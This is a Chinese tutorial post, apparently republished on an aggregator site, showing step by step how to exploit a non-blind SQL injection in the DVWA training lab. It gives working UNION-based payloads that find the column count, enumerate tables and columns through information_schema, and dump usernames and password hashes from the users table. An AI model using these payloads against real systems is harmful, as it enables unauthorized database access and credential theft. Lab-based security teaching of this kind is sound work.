DVWA 之 SQL注入(非盲注)

这篇具有很好参考价值的文章主要介绍了DVWA 之 SQL注入(非盲注)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

SQL注入

步骤:
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据

1.判断是否存在注入,注入是字符型还是数字型

输入1,查询成功:
DVWA 之 SQL注入(非盲注)

输入1’and ‘1’ =’2,查询失败,返回结果为空:
DVWA 之 SQL注入(非盲注)

输入1’or ‘1 ’=’1,查询成功:
DVWA 之 SQL注入(非盲注)

返回了多个结果,说明存在字符型注入。

2.猜解SQL查询语句中的字段数

输入1′ or 1=1 order by 1 #,查询成功:
DVWA 之 SQL注入(非盲注)

输入1′ or 1=1 order by 2 #,查询成功:
DVWA 之 SQL注入(非盲注)
输入1′ or 1=1 order by 3 #,查询失败:
DVWA 之 SQL注入(非盲注)

说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。
这里也可以通过输入union select 1,2,3…来猜解字段数)
输入:1’ union select 1#
DVWA 之 SQL注入(非盲注)

输入:1’ union select 1,2#
DVWA 之 SQL注入(非盲注)

3.确定显示的字段顺序

输入1′ union select 1,2 #,查询成功:
DVWA 之 SQL注入(非盲注)

说明执行的SQL语句为select First name,Surname from 表 where ID=’id’

4.获取当前数据库

输入1′ union select 1,database() #,查询成功:
DVWA 之 SQL注入(非盲注)

说明当前的数据库为dvwa。

5.获取数据库中的表

1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
DVWA 之 SQL注入(非盲注)

1’ union select 1,group_concat(hex(table_name)) from information_schema.tables where table_schema=database() #
DVWA 之 SQL注入(非盲注)

然后通过十六进制转字符串
http://tool.haooyou.com/code?group=convert&type=hexToStr&charset=UTF-8
还可以执行:
1’ union select 1,group_concat(unhex(hex(table_name))) from information_schema.tables where table_schema=database() #
DVWA 之 SQL注入(非盲注)

上面第一个SQL之所以失败,网上又说是编码格式的原因,修改表的编码格式一直就可以解决。具体没有实验,但是在实战中,这种方式应该行不通的。
说明数据库dvwa中一共有两个表,guestbook与users。

6.获取表中的字段名

输入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #,查询成功:
这里也会遇到和获取表名时一样的问题,可以执行
1’ union select 1,group_concat(unhex(hex(column_name))) from information_schema.columns where table_name=‘users’ #
DVWA 之 SQL注入(非盲注)

这里面还有有一个问题如果多个库中存在同名的字段怎么判断呢?
union select 1,group_concat(unhex(hex(column_name))) from information_schema.columns where table_name=‘users’ and table_schema = ‘dvwa’
DVWA 之 SQL注入(非盲注)

说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login

7.下载数据

输入1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功:
DVWA 之 SQL注入(非盲注)文章来源地址https://www.toymoban.com/news/detail-444080.html

到了这里,关于DVWA 之 SQL注入(非盲注)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • DVWA——SQL盲注(全等级)

    SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。

    2023年04月12日
    浏览(34)
  • DVWA------SQL Injection (Blind)(SQL盲注)

    一、SQL 盲注 1.简介 2.分类 3.盲注测试思路 二、SQL Injection (Blind) 1.LOW 1.1代码审计 1.2漏洞利用 2.medium 3.high 4.Impossible         SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法

    2024年02月16日
    浏览(38)
  • SQL Server判断数据库、表、列、视图、存储过程、函数是否存在

    在写一些业务逻辑相对复杂点的存储过程的时候,经常会用到临时表或者数据表作为临时结果的保存。但每次在作表是否存在的判断时,往往想不起完整的SQL写法。因此,记录一些常用的数据库对象是否存在的判断方法,可以达到快速查找的目的。正是:好记性不如烂笔头。

    2024年02月02日
    浏览(110)
  • [SQL Server 2008R2] 有关于判断表、字段、存过等元素是否存在相关SQL写法

    查询普通表是否存在可以使用object_id函数,下面的例子是查询表“t_test”是否存在之后从而进行其他的DLL操作:   临时表同样可以用object_id但是表名要记得加上库名和表空间: 或者 以上这个条件自行发挥,我这边使用的是like语句,判断的是只要是#temp开头的临时表存在。 有

    2023年04月26日
    浏览(74)
  • C# .NET SQL sugar中 IsAny进行根据条件判断数据是否存在 IsAny的使用

    首先确保你的Service层继承的表名 控制器中使用IsAny进行根据条件判断数据是否存在

    2024年01月20日
    浏览(49)
  • SQL注入-盲注(布尔盲注与时间盲注)

    目录 一、什么是盲注 二、盲注的分类 三、利用盲注的前提条件 四、盲注的优缺点 五、基于布尔类型的盲注 1.什么情况下使用布尔类型的盲注  2.使用布尔类型盲注的操作步骤: 3.布尔类型盲注的操作过程(以获取当前数据库为例)  4.使用其他函数进行布尔类型的盲注(演

    2024年02月07日
    浏览(69)
  • SQL注入-时间盲注

    当测试一个注入点时,我们使用多种方式测试,页面都显示正常,这就很难判断改点是否存在注入,可能会造成误断,这时候我们可以采用时间盲注的方法,来判断是否存在注入点以及猜解数据库信息。 时间盲注就是通过if 语句构造判断条件,是sleep函数来让数据库延迟查询

    2024年02月12日
    浏览(50)
  • SQL注入实战:盲注

    1、当攻击者利用SQL注入漏洞进行攻击时,有时候web应用程序会显示,后端数据库执行SQL查询返回的错误信息,这些信息能帮助进行SQL注入,但更多时候,数据库没有输出数据web页面,这是攻击者会查询一系列的true或false问题,或者基于时间判断的问题,强制从数据库获取数据

    2024年01月24日
    浏览(52)
  • 【SQL注入-布尔盲注】

    布尔型盲注应用于无数据回显,且WEB页面无报错信息的情况,此时不能通过报错型注入的方法来爆出数据,布尔型盲注的WEB页面只有两种回显结果,正确的页面以及错误的页面,且错误的页面无报错提示语句,正确的页面不能输出数据。 演示环境 phpStudy + mysql + sqlilabs 源码分

    2024年02月06日
    浏览(45)
  • SQL注入原理-时间盲注

            小伙伴们大家好!本期为大家带来的是SQL注入原理之时间盲注。 目录 使用环境 常见函数与语句 sleep()函数 if语句 substr()函数 ord()函数  length()函数  实战演示 1、判断是否存在注入点 2、使用时间盲注爆出数据 1、爆出当前数据库名的长度 2、爆出数据库名长度 3、爆

    2023年04月10日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包